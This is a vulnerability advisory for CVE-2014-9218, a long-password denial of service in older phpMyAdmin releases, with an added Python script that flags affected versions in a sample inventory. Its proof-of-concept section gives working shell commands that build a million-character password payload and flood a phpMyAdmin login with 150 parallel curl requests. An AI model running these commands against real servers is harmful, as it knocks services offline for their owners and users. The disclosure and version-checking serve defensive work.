phpMyAdmin 4.0.x, 4.1.x, 4.2.x – DoS

 

=============
Description:
=============
phpMyAdmin 4.0.x before 4.0.10.7, 4.1.x before 4.1.14.8, and 4.2.x before 4.2.13.1 allow attackers to cause resource exhaustion via a long password.
CVE-2014-9218
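
For inventory triage, the affected ranges listed above can be checked mechanically. The following Python is an added example, not part of the original advisory; the function names are this example's own, and the host names and version strings in INVENTORY are constructed.

```python
import re

# First fixed release per affected branch, taken from the description above.
FIXED = {
    (4, 0): (4, 0, 10, 7),
    (4, 1): (4, 1, 14, 8),
    (4, 2): (4, 2, 13, 1),
}

def parse_version(text):
    """Return the version as a 4-tuple of ints, or None if unparseable.

    A trailing packaging suffix (e.g. "-2+deb8u1") is ignored, so a distro
    package carrying a backported fix still reports by its upstream number;
    confirm such cases against the vendor's own advisory.
    """
    m = re.fullmatch(r"\s*(\d+(?:\.\d+){1,3})(?:[-+~].*)?\s*", text)
    if not m:
        return None
    parts = [int(p) for p in m.group(1).split(".")]
    return tuple(parts + [0] * (4 - len(parts)))  # "4.2.13" -> (4, 2, 13, 0)

def status(text):
    """Classify a phpMyAdmin version string against CVE-2014-9218."""
    v = parse_version(text)
    if v is None:
        return "unknown"
    fixed = FIXED.get(v[:2])
    if fixed is None:
        return "not-listed"  # branch is not named in this advisory
    return "affected" if v < fixed else "fixed"

def audit(inventory):
    """Map each host to its status."""
    return {host: status(ver) for host, ver in inventory.items()}

# Constructed sample inventory (hypothetical hosts and versions).
INVENTORY = {
    "db-admin-01": "4.2.13",
    "db-admin-02": "4.2.13.1",
    "legacy-pma": "4.0.10.6",
    "staging-pma": "4.1.14.8",
    "new-pma": "4.3.1",
}

if __name__ == "__main__":
    for host, result in audit(INVENTORY).items():
        print(f"{host}: {INVENTORY[host]} -> {result}")
```
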
*1 – Create the payload.*

$ echo -n "pma_username=xxxxxxxx&pma_password=" > payload && printf "%s" {1..1000000} >> payload

*2 – Run the DoS attack.*

$ for i in $(seq 1 150); do (curl --data @payload http://your-webserver-installation/phpmyadmin/ --silent > /dev/null &) done

=============
Authors:
=============

— Javer Nieto — http://www.behindthefirewalls.com
— Andres Rojas — http://www.devconsole.info
=============

References:
====================================================================

* http://www.behindthefirewalls.com/2014/12/when-cookies-lead-to-dos-in-phpmyadmin.html
* http://www.phpmyadmin.net/home_page/security/PMASA-2014-17.php
